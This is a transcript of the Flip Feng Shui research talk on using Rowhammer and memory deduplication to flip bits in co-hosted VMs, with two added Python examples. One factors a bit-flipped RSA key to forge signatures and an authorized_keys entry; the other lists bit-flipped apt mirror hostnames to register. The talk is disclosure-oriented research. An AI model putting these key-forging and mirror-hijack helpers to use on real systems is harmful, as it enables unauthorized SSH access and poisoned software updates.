Flip Feng Shui: Hammering a Needle in the Software Stack Ben Gras - - PowerPoint PPT Presentation



SLIDE 1

Flip Feng Shui: Hammering a Needle in the Software Stack

Ben Gras, Kaveh Razavi, Erik Bosman, Bart Preneel, Cristiano Giuffrida, Herbert Bos

August 10, 2016

SLIDE 2

Teaser

◮ OpenSSH compromise
◮ apt-get compromise by GPG signature forgery
◮ No software bug
◮ Weak assumptions
◮ Demo!

SLIDE 3

Contribution

Flip Feng Shui is a novel exploitation vector built from two ingredients:

◮ A hardware glitch that flips bits in memory
◮ A memory massaging primitive that controls which physical page the victim's data ends up in

The massaging primitive makes the glitch:

◮ Easy to target precisely
◮ Reliable

We demonstrate FFS = Rowhammer + Memory Deduplication


SLIDE 8

Outline

1. Flip Feng Shui At Work
2. Flip Feng Shui Mechanics
3. OpenSSH Attack
4. GPG/APT Updates Attack Demo
5. Notification, Conclusion & Further Resources

SLIDE 9

Section 1 Flip Feng Shui At Work

SLIDE 10

Flip Feng Shui

◮ Flip one bit per page in a co-hosted victim VM
◮ Works on any victim page whose contents the attacker knows
◮ Organised bit flip: the attacker chooses the target page and which of its templated bit positions to use
◮ Caused by a DRAM glitch, not by a software bug
◮ Breaks CPU virtualization isolation

SLIDE 11

Section 2 Flip Feng Shui Mechanics

SLIDE 12

Flip Feng Shui Mechanics

◮ Co-hosted VMs
◮ Memory deduplication
◮ Rowhammer
◮ RSA

SLIDE 13

Memory deduplication


SLIDE 18

Rowhammer

◮ Rapidly and repeatedly activating the same DRAM rows causes charge to leak from cells in adjacent rows
◮ Enough activations between two refreshes flip bits in those adjacent rows



SLIDE 30

Memory deduplication + Rowhammer = FFS

◮ The attacker writes a page with the same contents as the victim's page; the hypervisor's deduplication merges both into one shared physical page, marked copy-on-write
◮ A software write from the attacker would trigger a COW copy and leave the victim's page intact
◮ A Rowhammer flip is not a write the hypervisor sees: it changes the shared physical page in place, so the victim now reads the flipped data
◮ FFS breaks COW

SLIDE 31

RSA

◮ Public key cryptosystem
◮ Two keys: public (e, n) and private (d)
◮ Knowing the factorization of the modulus n lets you compute the secret private key

SLIDE 32

FFS - What now?

Break weakened RSA: a modulus with one flipped bit is no longer the product of two large primes, and with enough candidate flips one of the weakened moduli can usually be factored and its private key computed.

(Plot: factorization success probability, 0.1 to 1, against the number of available templates, 10 to 50, for 1024-bit, 2048-bit and 4096-bit moduli.)

SLIDE 33

Section 3 OpenSSH Attack

SLIDE 34

authorized keys file

Looks like this:

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDXy7MdVToVAvKB0/Xven/kqBzfRZm+GITl6sB0u+Aa3/UTC3x+eKjB2jf+48kTP7AvsdbSwg9Q5upN77xX3mNGwwj1RUQpOPPc99XH09M84iCydE+9smYseySfbJQnrov5Ricz2Z18Neuy5ZUH/Ldrf1NSwWoo5NZL6tj0E9JvZurMPPk2EqEyHltEFC6OetJwEfaPq9kOglmzFtBWLHR4dF1796JeVkFiWcmMaykAoN+JRF2nMlayPlUxdWR0JwxZ2cJ9la/QLXvv8x0tsORGP9ZG5BWqOcD781evuSS3i91BNg6Osl7mlxo6Mc3oUbew/7ddV08WjdRBn7iQF9WN beng@mymachine

◮ RSA public key (e and n, base64 encoded)
◮ Attacker writes a page with exactly these contents to its own memory, so deduplication merges it with the victim's copy
◮ We need the private key that matches the flipped public key
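An added worked example of the cryptographic step behind slides 31, 32 and 34; this is not code from the talk or from the VUSec project. It flips one bit of an RSA modulus, factors the weakened modulus, derives a private exponent that is valid for the flipped public key, forges a signature that verifies under that key, and renders the flipped key as an authorized_keys line. Assumptions made here: the primes are toy-sized (about 32 bits each) so that Pollard rho factors the result instantly, whereas a real 2048-bit target is only factorable for some flips; the flip is applied directly to the integer n, whereas the real attack flips a byte of the base64 text in authorized_keys (or of the key packet in trusted.gpg), which changes up to six bits of n at once; and scanning bit positions until one works stands in for the attacker choosing among its templates.

```python
"""Toy Flip Feng Shui crypto step: flip one bit of an RSA modulus, factor it,
derive a matching private exponent, forge a signature, emit the flipped key."""
import base64
import math
import random
import struct
E = 65537  # the usual public exponent

def is_probable_prime(n):  # Miller-Rabin, seeded from n so verdicts repeat
    if n < 4 or n % 2 == 0:
        return n in (2, 3)
    d, s = n - 1, 0
    while d % 2 == 0:
        d, s = d // 2, s + 1
    rng = random.Random(n)
    for _ in range(24):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True

def next_prime(n):
    while not is_probable_prime(n):
        n += 1
    return n

def pollard_rho(n):
    """Non-trivial factor of composite n (Floyd cycle finding, retrying c)."""
    if n % 2 == 0:
        return 2
    for c in range(1, 64):
        x, y, d = 2, 2, 1
        while d == 1:
            x = (x * x + c) % n
            y = (y * y + c) % n
            y = (y * y + c) % n
            d = math.gcd(abs(x - y), n)
        if d != n:
            return d
    raise ArithmeticError("rho gave up")  # not seen at toy sizes

def factor(n):
    """Full prime factorisation of n as a sorted list, repeats included."""
    if n == 1:
        return []
    if is_probable_prime(n):
        return [n]
    d = pollard_rho(n)
    return sorted(factor(d) + factor(n // d))

def carmichael(factors):
    """lambda(n') from its factorisation; handles repeated primes and 2."""
    lam = 1
    for p in set(factors):
        k = factors.count(p)
        if p == 2:
            lp = 1 if k == 1 else 2 if k == 2 else 2 ** (k - 2)
        else:
            lp = p ** (k - 1) * (p - 1)
        lam = lam * lp // math.gcd(lam, lp)
    return lam

def find_forgeable_flip(n, bit_positions):
    """Stand-in for picking a template: a flip is usable only if e is invertible mod lambda(n')."""
    for i in bit_positions:
        n2 = n ^ (1 << i)
        fs = factor(n2)
        lam = carmichael(fs)
        if math.gcd(E, lam) == 1:
            return i, n2, pow(E, -1, lam), fs
    return None

def ssh_rsa_line(e, n, comment="flipped@attacker"):
    """(e, n) rendered the way an authorized_keys entry stores an RSA key."""
    def mpint(x):  # big-endian, leading 0x00 when the top bit is set
        b = x.to_bytes((x.bit_length() + 8) // 8, "big")
        return struct.pack(">I", len(b)) + b
    blob = struct.pack(">I", 7) + b"ssh-rsa" + mpint(e) + mpint(n)
    return "ssh-rsa %s %s" % (base64.b64encode(blob).decode(), comment)

def verify_factorisation(factors, n):
    return math.prod(factors) == n and all(is_probable_prime(f) for f in factors)

def demo():
    p = next_prime(2 ** 31 + 12345)  # constructed toy primes, not a real key
    q = next_prime(2 ** 31 + 67890)
    n = p * q
    i, n2, d2, fs = find_forgeable_flip(n, range(8, n.bit_length()))
    m = 12345  # value to sign; must be coprime to n' if n' has a square factor
    while math.gcd(m, n2) != 1:
        m += 1
    sig = pow(m, d2, n2)  # verifies under the flipped public key (E, n2)
    return {"n": n, "bit": i, "n_flipped": n2, "factors": fs, "d": d2,
            "m": m, "sig": sig, "key_line": ssh_rsa_line(E, n2)}
```

`demo()` returns the original and flipped moduli, the factorisation of the flipped one, the forged signature and the authorized_keys line for the flipped key; the signature checks out under `(E, n_flipped)` but not under the victim's real key, which is exactly the situation FFS creates once the flip has landed in the victim's copy of the file.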

SLIDE 35

OpenSSH FFS attack


SLIDE 39

OpenSSH Attack

(Plot: CDF of attack time in minutes over successful attacks, 0.2 to 1 against 2 to 12 minutes.)

◮ Could retry

SLIDE 40

Section 4 GPG/APT Updates Attack Demo

SLIDE 41

GPG/APT Updates

◮ With FFS we flip a bit in /etc/apt/sources.list, so apt fetches its updates from an attacker-controlled mirror
◮ With FFS we flip a bit in the Ubuntu signing key stored in /etc/apt/trusted.gpg
◮ Use the private key computed for the flipped modulus to sign the attacker's repository
◮ Targets the long-term RSA Ubuntu archive signing keys
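An added example for the sources.list half of the attack; it is not the authors' code. The slide only says that a bit of /etc/apt/sources.list is flipped; this example assumes the intended effect is to turn the mirror's hostname into a different hostname the attacker can register ahead of time, and enumerates which single-bit flips of a hostname produce a syntactically valid, different name. Case-only flips are excluded, since DNS is case-insensitive and such a flip would leave the victim talking to the legitimate mirror. The hostname used is a constructed sample input; nothing here touches the network.

```python
"""Enumerate the single-bit flips of a hostname that still yield a valid, but
different, hostname: the candidates an attacker could register in advance."""
import re

# one DNS label: letters, digits, hyphens; 1-63 chars; no leading/trailing hyphen
LABEL_RE = re.compile(r"^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$")

def is_valid_hostname(host):
    host = host.lower()
    labels = host.split(".")
    if not 1 <= len(host) <= 253 or len(labels) < 2:
        return False
    if not labels[-1].isalpha():  # TLD must be letters (rules out "co-" and digits)
        return False
    return all(LABEL_RE.match(label) for label in labels)

def single_bit_flips(host):
    """(byte index, bit, new host) for each flip giving a different valid host.
    Case-only changes are dropped: DNS is case-insensitive, so such a flip would
    leave the victim talking to the legitimate server."""
    data = host.encode("ascii")
    hits = []
    for i, byte in enumerate(data):
        for bit in range(8):
            cand = data[:i] + bytes([byte ^ (1 << bit)]) + data[i + 1:]
            try:
                s = cand.decode("ascii")
            except UnicodeDecodeError:  # flipping bit 7 leaves ASCII
                continue
            if s.lower() != host.lower() and is_valid_hostname(s):
                hits.append((i, bit, s.lower()))
    return hits

def candidate_hosts(host):
    """Distinct registrable-looking hostnames reachable with one bit flip."""
    return sorted({h for _, _, h in single_bit_flips(host)})

if __name__ == "__main__":
    # constructed sample input: the kind of mirror name a sources.list points at
    for i, bit, h in single_bit_flips("archive.ubuntu.com"):
        print("byte %2d bit %d -> %s" % (i, bit, h))
```

Two edge cases the output makes visible: flipping bit 6 of a dot turns it into `n` and merges two labels into one still-valid name, while flipping bit 6 of the final `m` gives a trailing hyphen, which is rejected. The same bookkeeping applies to the base64 text of a GPG or SSH key, where a flipped byte is only useful if it still decodes to a well-formed key.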

SLIDE 42

Section 5 Notification, Conclusion & Further Resources

SLIDE 43

Notification

◮ Notified: Red Hat, Oracle, Xen, VMware, Debian, Ubuntu, OpenSSH, GnuPG, some hosting companies
◮ Thank you NCSC
◮ GnuPG commit

SLIDE 44

Conclusion

◮ Flip Feng Shui breaks isolation
◮ Co-hosting VMs is risky
◮ Disable memory dedup

https://www.vusec.net/projects/flip-feng-shui